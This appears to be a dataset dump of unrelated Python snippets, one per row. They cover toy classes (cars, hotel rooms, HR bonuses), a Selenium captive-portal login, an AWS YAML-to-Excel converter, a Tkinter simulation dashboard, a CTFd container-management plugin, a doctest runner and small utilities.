text stringlengths 38 1.54M |
|---|
def removeValor(numeros, valor):
    """Return a new list with every occurrence of *valor* removed from *numeros*.

    The original iterated by index (`for cont in range(len(...))`); a list
    comprehension is the idiomatic equivalent and does not mutate the input.
    """
    return [elemento for elemento in numeros if elemento != valor]


print(removeValor([1,2,4,5,6,3,2,4,5,12,2,3,2,4,5,2], 2))
|
class Car:
    """A simple car record: make, model, color and price, with tax helper."""

    def __init__(self, pMake, pModel, pColor, pPrice):
        self.make = pMake
        self.model = pModel
        self.color = pColor
        self.price = pPrice

    def __str__(self):
        return 'Make = %s, Model = %s, Color = %s, Price = %s' % (
            self.make, self.model, self.color, self.price)

    def selectColor(self):
        """Interactively ask the user for a new color and store it."""
        self.color = input('What is the new color? ')

    def calculateTax(self):
        """Return the price including a 10% tax (price unchanged)."""
        taxed_price = self.price * 1.1
        return taxed_price
# Demo: build a car, mutate it, and show the price with tax.
myFirstCar = Car('Honda','Civic','White',15000)
print(myFirstCar)
myFirstCar.price = 18000  # attributes are public; direct mutation is expected here
print(myFirstCar)
myFirstCar.selectColor()  # interactive: prompts on stdin for a new color
tax = myFirstCar.calculateTax()
print(tax)
class Room:
    """A hotel room whose nightly rate scales with the kind of day."""

    def __init__(self, pSize, pView, pType, pBasicRates):
        self.size = pSize
        self.view = pView
        self.type = pType
        self.basicrates = pBasicRates

    def __str__(self):
        return 'Size = %s, View = %s, Type = %s, Basic Rates = %s' % (
            self.size, self.view, self.type, self.basicrates)

    def calculateRates(self, day):
        """Return the rate for *day* (case-insensitive).

        'weekend' -> 1.5x, 'public holidays' -> 2x, 'christmas' -> 2.5x,
        anything else -> the basic rate.
        """
        multipliers = {'weekend': 1.5, 'public holidays': 2, 'christmas': 2.5}
        return self.basicrates * multipliers.get(day.lower(), 1)
# Demo: a double, city-view room with a basic rate of 120.
room1 = Room(132,'City','double',120)
print(room1)
print(room1.calculateRates('Public Holidays'))  # 2x multiplier -> 240
class HumanResource:
    """An employee record with a validated, non-negative bonus."""

    def __init__(self, pName, pSalary, pBonus):
        self.name = pName
        self.salary = pSalary
        self._bonus = pBonus

    def __str__(self):
        return 'Name = %s, Salary = %.2f, Bonus = %.2f' % (self.name, self.salary, self._bonus)

    @property
    def bonus(self):
        """The employee's bonus. Assigning a negative value raises ValueError."""
        return self._bonus

    @bonus.setter
    def bonus(self, value):
        # The original setter *returned* values instead of assigning, so every
        # write to ``obj.bonus`` was silently discarded (a setter's return
        # value is always ignored). Store the value; reject negatives loudly.
        if value < 0:
            raise ValueError('value cannot be less than 0')
        self._bonus = value
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from getpass import getpass
import time  # needed for the sleep at the end; the original forgot this import

phantomjs_exe = ".\\bin\\phantomjs.exe"

username = input("ENTER USERNAME - ")
if username == "":
    # Blank username -> fall back to credentials stored on disk.
    with open(".\\bin\\one_cred.txt") as f:
        cred = f.read().splitlines()
    username = cred[0]
    password = cred[1]
    print("Using stored username \"" + username + "\"")
else:
    print()
    print("Nothing will seem to type, but you are putting in your password anyway")
    password = getpass("ENTER PASSWORD - ")

print("Loading browser (phantomJS)...")
#driver = webdriver.Firefox()
# NOTE(review): PhantomJS support was removed from recent Selenium releases;
# consider a headless Chrome/Firefox -- confirm against the pinned selenium version.
driver = webdriver.PhantomJS(phantomjs_exe)
print("Loading msftconnecttest.com...")
xpath = driver.find_element_by_xpath
print("Logging in...")
try:
    driver.get("[redacted]")
    print("Logging in...")
    xpath('//*[@id="cmd_acceptAup"]').click()
    xpath('//*[@id="username"]').send_keys(username)
    xpath('//*[@id="password"]').send_keys(password)
    xpath('//*[@id="password"]').send_keys(Keys.RETURN)
except Exception as e:
    # Exceptions are not subscriptable: the original ``e["errormessage"]``
    # itself raised a TypeError and masked the real error.
    print(e)
    print("\n\n")
    print("There was an error (displayed above).")
    print("Maybe you are not connected, or are already logged in?")
    input()
time.sleep(5)
import re
#import csv

# Matches AWS export names of the form "nav-<word>".
tag = re.compile(r'nav-\w+')

with open('/Users/ymccarter/PycharmProjects/Mihon/Make-Life-Easy/DefCreation/awsdef4.yaml', 'r') as myfile:
    data = myfile.readlines()

print(tag.search('My number is Value: nav-navigatorauthgateway'))

deftag = []
# Context manager so the output file is flushed and closed even on error
# (the original opened ``fw`` and never closed it).
with open('deftag.txt', 'w') as fw:
    for line in data:
        print(line)
        if re.search(tag, line):
            line = line.replace(' Value: ', '')
            deftag.append(line)
            fw.write(line)
print(deftag)
#2nd example:
"""
Author Yukie McCarter
Date 9/30/18
This python program specifically convert NPInboud.yml to CSV value
1. using Openpyxl module
2. Create the List for each item Cidr, Destination service, Protocol (tcp or udp and so on) And FromPort and ToPort list
3.Sending column in order
"""
"""working
with open ('NP-Prod-Inbound.yml', 'r') as myfile: #open the YML file and correct data
data = myfile.readlines()
#print (data)
Cidr=[]
Destination=[]
protocol = []
IpProtocol=[]
FromPort=[]
ToPort=[]
for line in data:
if "CidrIp" in line:
line=line.replace('CidrIp: ','')
Cidr.append(line)
if "Fn::ImportValue: " in line:
line=line.replace("Fn::ImportValue: ","")
Destination.append(line)
if "IpProtocol: " in line:
line=line.replace('IpProtocol: ','')
IpProtocol.append(line)
if "FromPort: " in line:
line=line.replace("FromPort: ","")
FromPort.append(line)
if "ToPort: " in line:
line=line.replace("ToPort: ","")
ToPort.append(line)
from openpyxl import Workbook
#nfc_east = ('DAL', 'WAS', 'PHI', 'NYG')
wb = Workbook()
ws = wb.active
ws['A1']='Source Cidr'
ws['B1']='Destination Service'
ws['C1']='IpProtocol'
ws['D1']='FromPort'
ws['E1']='ToPort'
for row, i in enumerate(Cidr):
column_cell = 'A'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(Destination):
column_cell = 'B'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(IpProtocol):
column_cell = 'C'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(FromPort):
column_cell = 'D'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(ToPort):
column_cell = 'E'
ws[column_cell+str(row+2)] = str(i)
wb.save("NpProd-Inbound-Cidr.xlsx")
"""
def Yml2Createlist(file, savedfile):
    """Extract security-group rule fields from a YAML file into an Excel sheet.

    file: input YAML filename; savedfile: Excel workbook filename to write.
    Columns: Source Cidr / Destination Service / IpProtocol / FromPort / ToPort.
    """
    with open(file, 'r') as source:
        raw_lines = source.readlines()

    cidr_values = []         # CidrIp addresses
    destination_values = []  # imported destination service names
    protocol_values = []     # tcp / udp / gre / ...
    from_port_values = []    # FromPort numbers
    to_port_values = []      # ToPort numbers

    # (substring to look for, prefix stripped from the line,
    #  also strip single quotes?, destination bucket)
    extractors = [
        ("CidrIp", 'CidrIp: ', False, cidr_values),
        ("Fn::ImportValue: ", "Fn::ImportValue: ", False, destination_values),
        ("IpProtocol: ", 'IpProtocol: ', False, protocol_values),
        ("FromPort: ", "FromPort: ", True, from_port_values),
        ("ToPort: ", "ToPort: ", True, to_port_values),
    ]
    for line in raw_lines:
        # Same sequential-mutation semantics as the original chain of ifs.
        for needle, prefix, strip_quotes, bucket in extractors:
            if needle in line:
                line = line.replace(prefix, '')
                if strip_quotes:
                    line = line.replace("'", "")
                bucket.append(line)

    from openpyxl import Workbook
    workbook = Workbook()
    sheet = workbook.active
    header_by_column = {'A': 'Source Cidr', 'B': 'Destination Service',
                        'C': 'IpProtocol', 'D': 'FromPort', 'E': 'ToPort'}
    values_by_column = {'A': cidr_values, 'B': destination_values,
                        'C': protocol_values, 'D': from_port_values,
                        'E': to_port_values}
    for column, title in header_by_column.items():
        sheet[column + '1'] = title
    for column, values in values_by_column.items():
        # Data starts on row 2, immediately below the header row.
        for offset, value in enumerate(values):
            sheet[column + str(offset + 2)] = str(value)
    workbook.save(savedfile)


Yml2Createlist('NP-Prod-Inbound.yml', "NpProd-Inbound-Cidr.xlsx")
import sys
import math
from elevator import *
DOOR_OPEN_TIME = 10  # presumably seconds the doors stay open -- confirm in elevator.py
FLOORS_PER_SECOND = 1  # presumably elevator travel speed -- confirm in elevator.py
INITIAL_FLOOR = 1  # floor elevators are assumed to start on
WAIT_TIME = 1  # seconds added to a guest's waitTime per wait() tick
INFINITY = 9999  # sentinel for "unreachable" distances
BUSY_FLOORS = {0:0, 1:1, 10:0, 100:0} #key is each floor, value specifies whether an elevator has been assigned to that floor or not
class Guest(object):
    """A guest waiting for / riding an elevator in the simulation.

    The original used Python 2 print statements; converted to print() calls
    (same space-separated output) so the module runs under Python 3.
    """

    def __init__(self, id, startTime, startFloor, destinationFloor):
        self.id = id
        self.startTime = startTime
        self.startFloor = startFloor
        self.destinationFloor = destinationFloor
        self.waitTime = 0
        self.calledElevator = False
        self.onElevator = False  # False until addElevator() stores the elevator

    def isGoingUp(self):
        """True when the destination is above the starting floor."""
        return self.destinationFloor > self.startFloor

    def wait(self):
        """Accumulate one tick of waiting time and log the guest's status."""
        self.waitTime += WAIT_TIME
        if self.onElevator:
            print('Guest', self.id, 'going to floor', self.destinationFloor,
                  'waiting for', self.waitTime, 'seconds, on elevator', self.onElevator)
        else:
            print('Guest', self.id, 'starting on floor', self.startFloor,
                  'going to floor', self.destinationFloor,
                  'waiting for', self.waitTime, 'seconds, not on elevator yet')

    def addElevator(self, elevator):
        """Record the elevator this guest boarded."""
        self.onElevator = elevator

    def __str__(self):
        return ("ID: " + str(self.id) + " Start Time: " + str(self.startTime)
                + " Start Floor: " + str(self.startFloor)
                + " Destination Floor: " + str(self.destinationFloor)
                + " Waiting Time: " + str(self.waitTime))
list_of_numbers = []


def adding_to_list(read=input):
    """Prompt for five numbers and append them to list_of_numbers.

    read: the input function; injectable (defaults to the builtin input)
    so the prompting logic can be exercised without a terminal.
    """
    number_of_numbers = 5
    order = 0
    suffix = ""
    while number_of_numbers > 0:
        number_of_numbers = number_of_numbers - 1
        order = order + 1
        if order == 1:
            suffix = "st"
        elif order == 2:
            suffix = "nd"
        elif order == 3:
            suffix = "rd"
        elif order in (4, 5):
            # The original ``order == 4 or 5`` was always truthy; it only gave
            # the right answer by accident because orders 1-3 matched above.
            suffix = "th"
        list_of_numbers.append(int(read(f"Enter the {order}{suffix} number of the list: ")))


adding_to_list()
print(list_of_numbers)
sum_of_numbers = 0
for numbers in list_of_numbers:
    numbers = numbers ** 2
    sum_of_numbers = sum_of_numbers + numbers
print(f"The sum of the squares of the numbers in the list is {sum_of_numbers}!")
|
__author__ = 'gkour'
from simulator import Simulator, SimState
from visualization.dashboard import Dashboard
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as tk
from tkinter import ttk, Scale
import matplotlib.pyplot as plt
from config import ConfigPhysics
import sys
from queue import Queue
# Global matplotlib style and the shared font used by dashboard labels.
plt.style.use('seaborn-paper')
LARGE_FONT = ("Verdana", 12)
class OriginGUI:
    """Top-level window for Project Origin.

    Hosts the single SimulationPage and relays messages posted by the
    simulator (through ``msg_queue``) to it.
    """

    def __init__(self, master, *args, **kwargs):
        tk.Tk.wm_title(master, "Project Origin")
        #master.iconbitmap(default="visualization/originicon.bmp")
        self.master = master
        # Queue the simulator thread posts state/stats messages into.
        self.msg_queue = Queue()
        container = tk.Frame(master)
        container.pack(side="top", fill="both", expand=True)
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        self._simulation_page = SimulationPage(container, master, self.msg_queue)
        self._simulation_page.grid(row=0, column=0, sticky="nsew")
        self._simulation_page.tkraise()

    def refresh_data(self, msg):
        """Forward one simulator message to the simulation page."""
        self._simulation_page.refresh_data(msg)

    def process_incoming_msg(self):
        """Handle all messages currently in the queue, if any."""
        while self.msg_queue.qsize():
            try:
                self.refresh_data(self.msg_queue.get())
            except Exception as exp:
                # Swallow refresh errors so one bad message cannot kill the loop.
                print(str(exp))
                pass
class SimulationPage(tk.Frame):
    """The main page: simulation controls plus the live dashboard canvas."""

    def __init__(self, parent, controller, queue):
        # Dashboard owns the matplotlib figure that the simulator updates.
        self._dashboard = Dashboard()
        self.controller = controller
        self.simulator = Simulator(queue)
        self.window_closed = False
        tk.Frame.__init__(self, parent, bg='white')
        title_label = tk.Label(self, text="Project Origin Dashboard", font=LARGE_FONT, foreground='blue', bg='white')
        title_label.pack(pady=10, padx=10)
        self.s = ttk.Style()
        #self.s.theme_use('vista')
        self.status_label = tk.Label(self, text="Simulator Ready.", bg='white')
        self.status_label.pack(pady=10, padx=10)
        self.sim_btn = ttk.Button(self, text="Start Simulation", command=lambda: self.on_simulation_btn_click())
        self.sim_btn.pack()
        # Slider controlling the food/creature ratio of the simulated world.
        self.food_creature_scale = Scale(self, from_=0, to=1, orient=tk.HORIZONTAL, resolution=0.1, bg='white',
                                         command=lambda x: self.set_food_creature_ratio(x))
        self.food_creature_scale.set(ConfigPhysics.FOOD_CREATURE_RATIO)
        self.food_creature_scale.pack()
        dash_fig = self._dashboard.get_figure()
        canvas = FigureCanvasTkAgg(dash_fig, self)
        canvas.draw()
        canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
        # Intercept the window-manager close button so the simulator stops first.
        controller.protocol("WM_DELETE_WINDOW", self.close_window_event)
        # The simulation starts immediately when the page is built.
        self.on_simulation_btn_click()

    def close_window_event(self):
        """WM close handler: request a stop, then close now if already idle."""
        self.stop_simulation()
        self.window_closed = True
        if self.simulator.status() == SimState.IDLE:
            self.close_window()

    def close_window(self):
        """Destroy the Tk root and exit the process."""
        self.controller.destroy()
        sys.exit()

    def refresh_data(self, msg):
        """Consume one simulator message.

        SimState messages update the controls/status label; any other payload
        is assumed to carry step/epoch stats dataframes for the dashboard.
        """
        if type(msg) == SimState:
            print(msg.value)
            if msg == SimState.IDLE:
                self.sim_btn['text'] = 'Start Simulation'
                self.sim_btn['state'] = tk.ACTIVE
                # Deferred close: the user hit X while the simulator was busy.
                if self.window_closed:
                    self.close_window()
            self.status_label['text'] = str(msg.value)
        else:
            self._dashboard.update_step_dash(msg.step_stats_df)
            self._dashboard.update_epoch_dash(msg.epoch_stats_df)

    def on_simulation_btn_click(self):
        """Toggle between starting and stopping the simulation."""
        if self.sim_btn['text'] == 'Start Simulation':
            self.start_simulation()
            self.sim_btn['text'] = 'Stop Simulation'
        else:
            self.stop_simulation()
            # Button re-enables when the simulator reports IDLE (refresh_data).
            self.sim_btn['state'] = tk.DISABLED

    def stop_simulation(self):
        """Ask the simulator to stop; it finishes asynchronously."""
        self.simulator.stop()
        self.status_label['text'] = "Simulation Interrupted. Stopping..."

    def start_simulation(self):
        """Run the simulator on a background thread."""
        self.simulator.run_in_thread()

    @staticmethod
    def set_food_creature_ratio(new):
        # The Scale widget delivers its value as a string.
        ConfigPhysics.FOOD_CREATURE_RATIO = float(new)
|
# 物料编号申请模块
import json
from base_api.base import Base
from utils.get_pass_day import get_pass_date
from utils.get_today import get_today_date
class MatCodeApply(Base):
    """API wrapper for the material-code application module (物料编号申请)."""

    def search_by_order_no(self, order_no):
        """
        Query material-code applications by order number.

        The date window presumably spans the last 90 days up to today
        (see orderDayStart/orderDayEnd) -- confirm against the API docs.
        :param order_no: the order number to search for
        :return: the decoded JSON response body
        """
        url = self.ip + "/api/scm/auth/np/npMatCodeApplyH/list.do"
        params = {
            "orderNo": order_no,
            "orderDayStart": get_pass_date(90),
            "orderDayEnd": get_today_date(),
            "page": 1,
            "pageSize": 50,
            "skipWarn": "false",
        }
        r = self.s.post(url=url, params=params)
        # return json.dumps(r.json(), indent=2, ensure_ascii=False)
        return r.json()


if __name__ == "__main__":
    # Manual smoke test against the live service.
    test = MatCodeApply()
    print(test.search_by_order_no("1"))
|
from __future__ import division # Use floating point for math calculations
from CTFd.plugins import register_plugin_assets_directory
from CTFd.plugins.flags import get_flag_class
from CTFd.utils.user import get_current_user
from CTFd import utils
from CTFd.models import (
db,
Solves,
Fails,
Flags,
Challenges,
ChallengeFiles,
Tags,
Hints,
Users,
Notifications
)
from flask import render_template, request, jsonify, Blueprint, current_app
from CTFd.utils.user import get_ip
from CTFd.utils.uploads import delete_file
from CTFd.utils.decorators import admins_only, authed_only
from CTFd.utils.modes import get_model
from CTFd.utils import user as current_user
from .models import DynamicCheckValueChallenge, DynamicCheckChallenge
from CTFd.plugins.challenges import CHALLENGE_CLASSES
from .db_utils import DBUtils
from .control_utils import ControlUtil
from .frp_utils import FrpUtils
import datetime, fcntl
from flask_apscheduler import APScheduler
import logging, os, sys
from .extensions import get_mode
def load(app):
    """CTFd plugin entry point.

    Registers the dynamic-check challenge type, the admin/user blueprint,
    the plugin logger, and a background job that destroys expired containers.
    """
    # ``logging.handlers`` is a submodule that is NOT guaranteed to be bound
    # by ``import logging`` alone; the original relied on some other library
    # having imported it, otherwise the RotatingFileHandler line raised
    # AttributeError -- which the ``except IOError`` below does not catch.
    import logging.handlers

    # upgrade()
    app.db.create_all()
    CHALLENGE_CLASSES["dynamic_check_docker"] = DynamicCheckValueChallenge
    register_plugin_assets_directory(
        app, base_path="/plugins/ctfd-owl/assets/"
    )
    owl_blueprint = Blueprint(
        "ctfd-owl",
        __name__,
        template_folder="templates",
        static_folder="assets",
        url_prefix="/plugins/ctfd-owl"
    )

    # --- plugin logger: rotating file (best effort) plus stdout ---
    log_dir = app.config["LOG_FOLDER"]
    logger_owl = logging.getLogger("owl")
    logger_owl.setLevel(logging.INFO)
    logs = {
        "owl": os.path.join(log_dir, "owl.log"),
    }
    try:
        for log in logs.values():
            if not os.path.exists(log):
                open(log, "a").close()
        container_log = logging.handlers.RotatingFileHandler(
            logs["owl"], maxBytes=10000
        )
        logger_owl.addHandler(container_log)
    except IOError:
        # File logging is best-effort; fall back to stdout only.
        pass
    stdout = logging.StreamHandler(stream=sys.stdout)
    logger_owl.addHandler(stdout)
    logger_owl.propagate = 0

    @owl_blueprint.route('/admin/settings', methods=['GET'])
    @admins_only
    # list plugin settings
    def admin_list_configs():
        configs = DBUtils.get_all_configs()
        return render_template('configs.html', configs=configs)

    @owl_blueprint.route('/admin/settings', methods=['PATCH'])
    @admins_only
    # modify plugin settings
    def admin_save_configs():
        req = request.get_json()
        DBUtils.save_all_configs(req.items())
        return jsonify({'success': True})

    @owl_blueprint.route("/admin/containers", methods=['GET'])
    @admins_only
    # list alive containers
    def admin_list_containers():
        mode = utils.get_config("user_mode")
        configs = DBUtils.get_all_configs()
        page = abs(request.args.get("page", 1, type=int))
        results_per_page = 50
        page_start = results_per_page * (page - 1)
        page_end = results_per_page * (page - 1) + results_per_page
        count = DBUtils.get_all_alive_container_count()
        containers = DBUtils.get_all_alive_container_page(page_start, page_end)
        # ceil(count / results_per_page) without importing math
        pages = int(count / results_per_page) + (count % results_per_page > 0)
        return render_template("containers.html", containers=containers, pages=pages, curr_page=page,
                               curr_page_start=page_start, configs=configs, mode=mode)

    @owl_blueprint.route("/admin/containers", methods=['PATCH'])
    @admins_only
    def admin_expired_container():
        user_id = request.args.get('user_id')
        challenge_id = request.args.get('challenge_id')
        ControlUtil.expired_container(user_id=user_id, challenge_id=challenge_id)
        return jsonify({'success': True})

    @owl_blueprint.route("/admin/containers", methods=['DELETE'])
    @admins_only
    def admin_delete_container():
        user_id = request.args.get('user_id')
        ControlUtil.destroy_container(user_id)
        return jsonify({'success': True})

    # instances
    @owl_blueprint.route('/container', methods=['GET'])
    @authed_only
    def list_container():
        """Describe the caller's running container (connection info + TTL)."""
        try:
            user_id = get_mode()
            challenge_id = request.args.get('challenge_id')
            ControlUtil.check_challenge(challenge_id, user_id)
            data = ControlUtil.get_container(user_id=user_id)
            configs = DBUtils.get_all_configs()
            domain = configs.get('frp_http_domain_suffix', "")
            if data is not None:
                # Container exists but belongs to another challenge: report nothing.
                if int(data.challenge_id) != int(challenge_id):
                    return jsonify({})
                dynamic_docker_challenge = DynamicCheckChallenge.query \
                    .filter(DynamicCheckChallenge.id == data.challenge_id) \
                    .first_or_404()
                lan_domain = str(user_id) + "-" + data.docker_id
                if dynamic_docker_challenge.deployment == "single":
                    return jsonify({'success': True, 'type': 'redirect', 'ip': configs.get('frp_direct_ip_address', ""),
                                    'port': data.port,
                                    'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
                                    'lan_domain': lan_domain})
                else:
                    if dynamic_docker_challenge.redirect_type == "http":
                        # Omit ":80" since browsers imply it for http URLs.
                        if int(configs.get('frp_http_port', "80")) == 80:
                            return jsonify({'success': True, 'type': 'http', 'domain': data.docker_id + "." + domain,
                                            'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
                                            'lan_domain': lan_domain})
                        else:
                            return jsonify({'success': True, 'type': 'http',
                                            'domain': data.docker_id + "." + domain + ":" + configs.get('frp_http_port', "80"),
                                            'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
                                            'lan_domain': lan_domain})
                    else:
                        return jsonify({'success': True, 'type': 'redirect', 'ip': configs.get('frp_direct_ip_address', ""),
                                        'port': data.port,
                                        'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
                                        'lan_domain': lan_domain})
            else:
                return jsonify({'success': True})
        except Exception as e:
            return jsonify({'success': False, 'msg': str(e)})

    @owl_blueprint.route('/container', methods=['POST'])
    @authed_only
    def new_container():
        """Launch a fresh container for the caller, subject to global limits."""
        try:
            user_id = get_mode()
            if ControlUtil.frequency_limit():
                return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
            # check whether exist container before
            existContainer = ControlUtil.get_container(user_id)
            if existContainer:
                return jsonify({'success': False, 'msg': 'You have boot {} before.'.format(existContainer.challenge.name)})
            else:
                challenge_id = request.args.get('challenge_id')
                ControlUtil.check_challenge(challenge_id, user_id)
                configs = DBUtils.get_all_configs()
                current_count = DBUtils.get_all_alive_container_count()
                # print(configs.get("docker_max_container_count"))
                if configs.get("docker_max_container_count") != "None":
                    if int(configs.get("docker_max_container_count")) <= int(current_count):
                        return jsonify({'success': False, 'msg': 'Max container count exceed.'})
                dynamic_docker_challenge = DynamicCheckChallenge.query \
                    .filter(DynamicCheckChallenge.id == challenge_id) \
                    .first_or_404()
                try:
                    result = ControlUtil.new_container(user_id=user_id, challenge_id=challenge_id)
                    if isinstance(result, bool):
                        return jsonify({'success': True})
                    else:
                        return jsonify({'success': False, 'msg': str(result)})
                except Exception as e:
                    # NOTE(review): 'success': True on a launch failure looks
                    # inconsistent with the other error paths -- confirm
                    # whether the frontend depends on it before changing.
                    return jsonify({'success': True, 'msg':'Failed when launch instance, please contact with the admin.'})
        except Exception as e:
            return jsonify({'success': False, 'msg': str(e)})

    @owl_blueprint.route('/container', methods=['DELETE'])
    @authed_only
    def destroy_container():
        """Tear down the caller's container."""
        user_id = get_mode()
        if ControlUtil.frequency_limit():
            return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
        if ControlUtil.destroy_container(user_id):
            return jsonify({'success': True})
        else:
            return jsonify({'success': False, 'msg': 'Failed when destroy instance, please contact with the admin!'})

    @owl_blueprint.route('/container', methods=['PATCH'])
    @authed_only
    def renew_container():
        """Extend the caller's container lifetime, up to a configured maximum."""
        user_id = get_mode()
        if ControlUtil.frequency_limit():
            return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
        configs = DBUtils.get_all_configs()
        challenge_id = request.args.get('challenge_id')
        ControlUtil.check_challenge(challenge_id, user_id)
        docker_max_renew_count = int(configs.get("docker_max_renew_count"))
        container = ControlUtil.get_container(user_id)
        if container is None:
            return jsonify({'success': False, 'msg': 'Instance not found.'})
        if container.renew_count >= docker_max_renew_count:
            return jsonify({'success': False, 'msg': 'Max renewal times exceed.'})
        ControlUtil.expired_container(user_id=user_id, challenge_id=challenge_id)
        return jsonify({'success': True})

    def auto_clean_container():
        # Runs in the APScheduler thread, so an app context must be pushed.
        with app.app_context():
            results = DBUtils.get_all_expired_container()
            for r in results:
                ControlUtil.destroy_container(r.user_id)
            FrpUtils.update_frp_redirect()

    app.register_blueprint(owl_blueprint)

    try:
        # Exclusive, non-blocking file lock: only ONE worker process may run
        # the cleanup scheduler; the others fail the lock and skip it.
        lock_file = open("/tmp/ctfd_owl.lock", "w")
        lock_fd = lock_file.fileno()
        fcntl.lockf(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)

        scheduler = APScheduler()
        scheduler.init_app(app)
        scheduler.start()
        scheduler.add_job(id='owl-auto-clean', func=auto_clean_container, trigger="interval", seconds=5)
        print("[CTFd Owl]Started successfully")
    except IOError:
        pass
import os, time

Tree = []  # accumulated lower-cased file paths
Incomplete_Paths = []  # directories still waiting to be expanded


def Is_File(Path):
    """True when *Path* refers to a regular file."""
    return os.path.isfile(Path)


def File_Path_Handler(Dir):
    """Classify every entry of *Dir*: files go into Tree, dirs queue for later."""
    Branches = List_Items_In(Dir)
    for branch in Branches:
        Path = Dir + '/' + branch
        if Is_File(Path):
            Tree.append(Path.lower())
        else:
            Incomplete_Paths.append(Path)


def List_Items_In(Dir):
    """Return the names of all entries directly inside *Dir*."""
    return list(os.listdir(Dir))


def Tree_Builder(Base_Dir):
    """Walk *Base_Dir* breadth-first, filling Tree with every file path found.

    Appending to Incomplete_Paths while iterating it is intentional: the loop
    keeps consuming newly discovered sub-directories until none remain.
    """
    File_Path_Handler(Base_Dir)
    for x in Incomplete_Paths:
        File_Path_Handler(x)


if __name__ == '__main__':
    # The original called Tree_Builder() with no argument (a TypeError) and
    # printed with a Python 2 statement; start from the current directory.
    Tree_Builder(os.getcwd())
    print(Tree)
#!/usr/bin/env python
# pylint: disable=bare-except
import sys
from glob import glob as _glob
from pathlib import Path
import re
from subprocess import run
import os
import logging
from rich.panel import Panel
from rich.padding import Padding
from rich.console import Console
try:
from clavier import log as logging
from clavier.io import OUT
except ImportError:
import logging
from rich.console import Console
OUT = Console(file=sys.stdout)
LOG = logging.getLogger("stats.doctest")
REPO_ROOT = Path(__file__).parents[2]
PKG_ROOT = REPO_ROOT / 'cli'
ARGS = sys.argv[1:]
def glob(path):
    """Recursive glob that accepts Path objects and returns a list of matches."""
    pattern = str(path)
    return _glob(pattern, recursive=True)
def rel(path):
    """Render *path* relative to the CWD as ``./...``; fall back to str(path).

    Only ValueError (raised when *path* is not under the CWD, or is relative
    while the CWD is absolute) triggers the fallback; the original bare
    ``except:`` also swallowed KeyboardInterrupt and genuine bugs.
    """
    try:
        return f"./{Path(path).relative_to(Path.cwd())}"
    except ValueError:
        return str(path)
def is_doctest(path):
    """True if any line of the file invokes doctest.testmod(...)."""
    pattern = re.compile(r'\s*doctest(?:ing)?\.testmod\(.*\)')
    with open(path, 'r') as source:
        for line in source:
            # if re.match(r'\s*\>\>\>', line):
            if pattern.match(line):
                return True
    return False
def module_for(path):
    """Translate a ``.py`` file path under PKG_ROOT into a dotted module name."""
    relative = str(Path(path).relative_to(PKG_ROOT))
    without_ext = relative[:-3]  # strip the ".py" suffix
    return ".".join(without_ext.split('/'))
def module_roots(pkg_root: Path = PKG_ROOT):
    """Yield each top-level package directory directly under *pkg_root*."""
    for init_file in glob(pkg_root / "*" / "__init__.py"):
        yield Path(init_file).parents[0]
def pkg_modules(pkg_root: Path = PKG_ROOT):
    """Yield (module_name, path) for every doctest-bearing module under *pkg_root*."""
    for root in module_roots(pkg_root):
        for candidate in glob(root / "**" / "*.py"):
            candidate_path = Path(candidate)
            if is_doctest(candidate_path):
                yield (module_for(candidate_path), candidate_path)
def env():
    """Return a copy of the process environment with DOCTESTING set."""
    merged = dict(os.environ)
    merged["DOCTESTING"] = "yup"
    return merged
def test(name, cmd):
    """Run *cmd*; report pass/fail through OUT and return True on success.

    Success means a zero exit status AND an empty stdout (doctest is silent
    when everything passes).
    """
    result = run(cmd, capture_output=True, encoding='utf8', env=env(), check=False)
    if result.returncode == 0 and not result.stdout:
        OUT.print(":white_check_mark:", name)
        return True
    if result.stdout:
        OUT.print(Panel(Padding(result.stdout, 1), title=f"STDOUT {name}"))
    if result.stderr:
        OUT.print(Panel(Padding(result.stderr, 1), title=f"STDERR {name}"))
    OUT.print(":x:", name)
    return False
def test_module(module):
    """Doctest *module* by executing it with ``python -m`` (runs its testmod call)."""
    return test(module, ['python', '-m', module])
def test_file(path):
    """Doctest a single file directly via ``python -m doctest``."""
    return test(rel(path), ['python', '-m', 'doctest', path])
def is_pkg_module(path):
    """True when *path* lives inside the ``stats`` package tree.

    Path.relative_to raises ValueError for paths outside the tree; the
    original bare ``except:`` also hid unrelated errors.
    """
    try:
        Path(path).relative_to(PKG_ROOT / 'stats')
    except ValueError:
        return False
    return True
def main():
    """Run doctests for every package module, or just the paths given in ARGS.

    Exits with status 1 if any test failed.
    """
    if hasattr(logging, "setup"):
        logging.setup("stats.doctest", level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.DEBUG)
    ok = True
    if len(ARGS) == 0:
        for module, path in pkg_modules():
            # Run the test FIRST: the original ``ok = ok and test_module(...)``
            # short-circuited and skipped every remaining test after the
            # first failure.
            ok = test_module(module) and ok
    else:
        for arg in ARGS:
            if is_pkg_module(arg):
                ok = test_module(module_for(arg)) and ok
            else:
                ok = test_file(arg) and ok
    if not ok:
        sys.exit(1)


if __name__ == '__main__':
    main()
|
from functools import partial
from mmcv.runner import get_dist_info
from mmcv.parallel import collate
from torch.utils.data import DataLoader
import numpy as np
# https://github.com/pytorch/pytorch/issues/973
# Raise the soft open-file limit: many dataloader workers can exhaust the
# default, causing "too many open files" errors. The hard limit is preserved.
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1]))
def worker_init_fn(worker_id):
    """Give each dataloader worker a distinct, reproducible numpy seed."""
    base_seed = np.random.get_state()[1][0]
    np.random.seed(base_seed + worker_id)
